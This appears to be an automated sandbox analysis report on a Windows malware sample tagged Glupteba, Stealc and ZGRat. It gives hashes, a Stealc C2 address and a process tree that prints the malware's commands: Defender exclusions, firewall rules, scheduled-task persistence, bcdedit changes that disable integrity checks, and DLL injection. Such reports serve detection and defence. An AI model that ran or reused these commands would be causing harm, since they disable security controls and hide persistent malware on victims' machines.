Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

winprofile

windows7-x64

winprofile

windows10-1703-x64

Analysis

  • max time kernel
    136s
  • max time network
    139s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    18/04/2024, 22:21

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown: "{\"level\":\"info\",\"time\":\"2024-04-18T22:23:36Z\",\"message\":\"Dirty snapshot: /var/lib/sandbox/hatchvm/win7-20231129-en/instance_3-dirty.qcow2\"}"
Report Analysis Logs

General

  • Target

    0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe

  • Size

    559KB

  • MD5

    9ee0c556e1b952495a74709e6b06459a

  • SHA1

    1b631e41b43d6f7ef3f7d140c1eb14ecf1cd861d

  • SHA256

    0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129

  • SHA512

    1ec91c9e0ab4e359be73677f81150922ed06fc58e621e2115d4c607afb94dbf69a8362db14a531ff6aba69b1dc8e3cd2a0aa0ba626320caa9c250060bbe44558

  • SSDEEP

    12288:yi/BY1Np6gS4GerR72nfELsEtYi19W5I3v/CgeX:yGY5dr2RECW9II/uX

Score
10/10
gluptebastealczgratdiscoverydropperevasionloaderpersistenceratrootkitspywarestealerthemidatrojan

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.209

Attributes
  • url_path

    /3cd2b41cbde8fc9c.php

Signatures

  • Detect ZGRat V1 2 IoCs
  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

    loaderdropperglupteba
  • Glupteba payload 14 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
    evasion
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • UAC bypass 3 TTPs 1 IoCs
    evasiontrojan
  • Windows security bypass 2 TTPs 48 IoCs
    evasiontrojan
  • ZGRat

    ZGRat is remote access trojan written in C#.

    ratzgrat
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • Modifies boot configuration data using bcdedit 14 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Possible attempt to disable PatchGuard 2 TTPs

    Rootkits can use kernel patching to embed themselves in an operating system.

    evasion
  • Checks BIOS information in registry 2 TTPs 4 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 7 IoCs
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 62 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Registers COM server for autorun 1 TTPs 14 IoCs
    persistence
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Windows security modification 2 TTPs 8 IoCs
    evasiontrojan
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 4 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 3 IoCs
    evasiontrojan
  • Drops Chrome extension 2 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Manipulates WinMon driver. 1 IoCs

    Roottkits write to WinMon to hide PIDs from being detected.

    rootkitevasion
  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

    rootkitevasion
  • Drops file in System32 directory 30 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 28 IoCs
  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 12 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 7 IoCs
  • Suspicious use of SendNotifyMessage 7 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
    evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe
    "C:\Users\Admin\AppData\Local\Temp\0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe"
    1⤵
    • UAC bypass
    • Checks whether UAC is enabled
    • Suspicious use of SetThreadContext
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:824
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\0e236536f9fc793be5f2e276555817d0bb9206e9d56904bc509188bc42515129.exe" -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2164
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
      2⤵
      • Drops startup file
      • Loads dropped DLL
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2008
      • C:\Users\Admin\Pictures\7wQhpSx1j6VjjJwiHraNyS7W.exe
        "C:\Users\Admin\Pictures\7wQhpSx1j6VjjJwiHraNyS7W.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Users\Admin\AppData\Local\Temp\u180.0.exe
          "C:\Users\Admin\AppData\Local\Temp\u180.0.exe"
          4⤵
          • Executes dropped EXE
          PID:320
        • C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe
          "C:\Users\Admin\AppData\Local\Temp\Qg_Appv5.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          PID:1908
          • C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
            C:\Users\Admin\AppData\Local\Temp\Zqicom_beta\UniversalInstaller.exe
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:2412
            • C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
              C:\Users\Admin\AppData\Roaming\Zqicom_beta\UniversalInstaller.exe
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:604
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\SysWOW64\cmd.exe
                7⤵
                • Suspicious use of SetThreadContext
                • Drops file in Windows directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:2040
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  8⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:2492
        • C:\Users\Admin\AppData\Local\Temp\u180.1.exe
          "C:\Users\Admin\AppData\Local\Temp\u180.1.exe"
          4⤵
          • Executes dropped EXE
          • Checks SCSI registry key(s)
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2752
          • C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
            "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
            5⤵
            • Loads dropped DLL
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1852
      • C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe
        "C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1900
        • C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe
          "C:\Users\Admin\Pictures\ZHWH2GFKQja0muj4RLymlJe3.exe"
          4⤵
          • Windows security bypass
          • Executes dropped EXE
          • Windows security modification
          • Adds Run key to start application
          • Checks for VirtualBox DLLs, possible anti-VM trick
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          PID:2428
          • C:\Windows\system32\cmd.exe
            C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
            5⤵
              PID:564
              • C:\Windows\system32\netsh.exe
                netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                6⤵
                • Modifies Windows Firewall
                PID:768
        • C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe
          "C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2592
          • C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe
            "C:\Users\Admin\Pictures\XFyfSPWtThhhYf9nK71Dwc6z.exe"
            4⤵
            • Windows security bypass
            • Executes dropped EXE
            • Loads dropped DLL
            • Windows security modification
            • Adds Run key to start application
            • Checks for VirtualBox DLLs, possible anti-VM trick
            • Drops file in Windows directory
            • Modifies data under HKEY_USERS
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:1972
            • C:\Windows\system32\cmd.exe
              C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
              5⤵
                PID:1852
                • C:\Windows\system32\netsh.exe
                  netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                  6⤵
                  • Modifies Windows Firewall
                  • Modifies data under HKEY_USERS
                  PID:1608
              • C:\Windows\rss\csrss.exe
                C:\Windows\rss\csrss.exe
                5⤵
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Loads dropped DLL
                • Adds Run key to start application
                • Manipulates WinMon driver.
                • Manipulates WinMonFS driver.
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies system certificate store
                • Suspicious use of AdjustPrivilegeToken
                PID:1548
                • C:\Windows\system32\schtasks.exe
                  schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                  6⤵
                  • Creates scheduled task(s)
                  PID:2808
                • C:\Windows\system32\schtasks.exe
                  schtasks /delete /tn ScheduledUpdate /f
                  6⤵
                    PID:2440
                  • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                    6⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2724
                  • C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
                    "C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
                    6⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Modifies system certificate store
                    PID:588
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2764
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1760
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2712
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1696
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1952
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2208
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2604
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1876
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:392
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:1540
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2028
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -timeout 0
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2372
                    • C:\Windows\system32\bcdedit.exe
                      C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
                      7⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2160
                  • C:\Windows\system32\bcdedit.exe
                    C:\Windows\Sysnative\bcdedit.exe /v
                    6⤵
                    • Modifies boot configuration data using bcdedit
                    PID:1492
                  • C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
                    6⤵
                    • Executes dropped EXE
                    PID:2656
                  • C:\Windows\system32\schtasks.exe
                    schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                    6⤵
                    • Creates scheduled task(s)
                    PID:1564
                  • C:\Windows\windefender.exe
                    "C:\Windows\windefender.exe"
                    6⤵
                    • Executes dropped EXE
                    PID:2764
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                      7⤵
                        PID:2616
                        • C:\Windows\SysWOW64\sc.exe
                          sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                          8⤵
                          • Launches sc.exe
                          PID:2596
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      6⤵
                      • Executes dropped EXE
                      PID:2132
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      6⤵
                      • Executes dropped EXE
                      PID:1600
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      6⤵
                      • Executes dropped EXE
                      PID:2668
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      6⤵
                      • Executes dropped EXE
                      PID:2168
                    • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                      C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                      6⤵
                      • Executes dropped EXE
                      PID:3048
              • C:\Users\Admin\Pictures\Ae6KcqZDG3RHyqUIPyDn6abJ.exe
                "C:\Users\Admin\Pictures\Ae6KcqZDG3RHyqUIPyDn6abJ.exe"
                3⤵
                • Modifies firewall policy service
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Checks whether UAC is enabled
                • Drops file in System32 directory
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                PID:2972
              • C:\Users\Admin\Pictures\VlEvAYeyGWtNYpmsg8pkMJtj.exe
                "C:\Users\Admin\Pictures\VlEvAYeyGWtNYpmsg8pkMJtj.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of WriteProcessMemory
                PID:2424
                • C:\Users\Admin\AppData\Local\Temp\7zS56C7.tmp\Install.exe
                  .\Install.exe /sQwdidHh "385118" /S
                  4⤵
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Enumerates system info in registry
                  • Suspicious use of WriteProcessMemory
                  PID:1204
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                    5⤵
                      PID:2348
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        6⤵
                          PID:2608
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                            7⤵
                            • Drops file in System32 directory
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2664
                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                              8⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1492
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 22:22:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\blelkQh.exe\" em /sVsite_idvNQ 385118 /S" /V1 /F
                        5⤵
                        • Drops file in Windows directory
                        • Creates scheduled task(s)
                        PID:2624
                  • C:\Users\Admin\Pictures\YAS96WTmaOYBISF8paPzyxEg.exe
                    "C:\Users\Admin\Pictures\YAS96WTmaOYBISF8paPzyxEg.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Adds Run key to start application
                    PID:2776
                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                      4⤵
                      • Executes dropped EXE
                      PID:880
                      • C:\Windows\system32\msiexec.exe
                        "msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
                        5⤵
                          PID:984
                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe
                          "ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"
                          5⤵
                          • Executes dropped EXE
                          PID:1752
                  • C:\Windows\system32\WerFault.exe
                    C:\Windows\system32\WerFault.exe -u -p 824 -s 668
                    2⤵
                      PID:2660
                  • C:\Windows\system32\makecab.exe
                    "C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240418222124.log C:\Windows\Logs\CBS\CbsPersist_20240418222124.cab
                    1⤵
                    • Drops file in Windows directory
                    PID:2320
                  • C:\Windows\system32\taskeng.exe
                    taskeng.exe {FA2269D9-F8B7-453F-B6AE-65668BCC4A4F} S-1-5-18:NT AUTHORITY\System:Service:
                    1⤵
                      PID:2416
                      • C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\blelkQh.exe
                        C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\blelkQh.exe em /sVsite_idvNQ 385118 /S
                        2⤵
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        PID:2244
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /CREATE /TN "gWMDLQIWd" /SC once /ST 05:27:04 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                          3⤵
                          • Creates scheduled task(s)
                          PID:1136
                        • C:\Windows\SysWOW64\schtasks.exe
                          schtasks /run /I /tn "gWMDLQIWd"
                          3⤵
                            PID:3032
                          • C:\Windows\SysWOW64\schtasks.exe
                            schtasks /DELETE /F /TN "gWMDLQIWd"
                            3⤵
                              PID:620
                            • C:\Windows\SysWOW64\forfiles.exe
                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                              3⤵
                                PID:3060
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                  4⤵
                                    PID:1668
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                      5⤵
                                      • Drops file in System32 directory
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:2148
                                      • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                        6⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2004
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                    PID:2680
                                    • C:\Windows\SysWOW64\reg.exe
                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                      4⤵
                                      • Windows security bypass
                                      PID:2936
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                      PID:1068
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                        4⤵
                                        • Windows security bypass
                                        PID:1992
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:2744
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:32
                                          4⤵
                                            PID:1740
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                          3⤵
                                            PID:1472
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\ofqvFcNvzeRditbz" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                                PID:1000
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /C copy nul "C:\Windows\Temp\ofqvFcNvzeRditbz\XPEjsHBj\jukrhudKuTrYNCEr.wsf"
                                              3⤵
                                                PID:2632
                                              • C:\Windows\SysWOW64\wscript.exe
                                                wscript "C:\Windows\Temp\ofqvFcNvzeRditbz\XPEjsHBj\jukrhudKuTrYNCEr.wsf"
                                                3⤵
                                                • Modifies data under HKEY_USERS
                                                PID:2256
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                  4⤵
                                                  • Windows security bypass
                                                  PID:2152
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
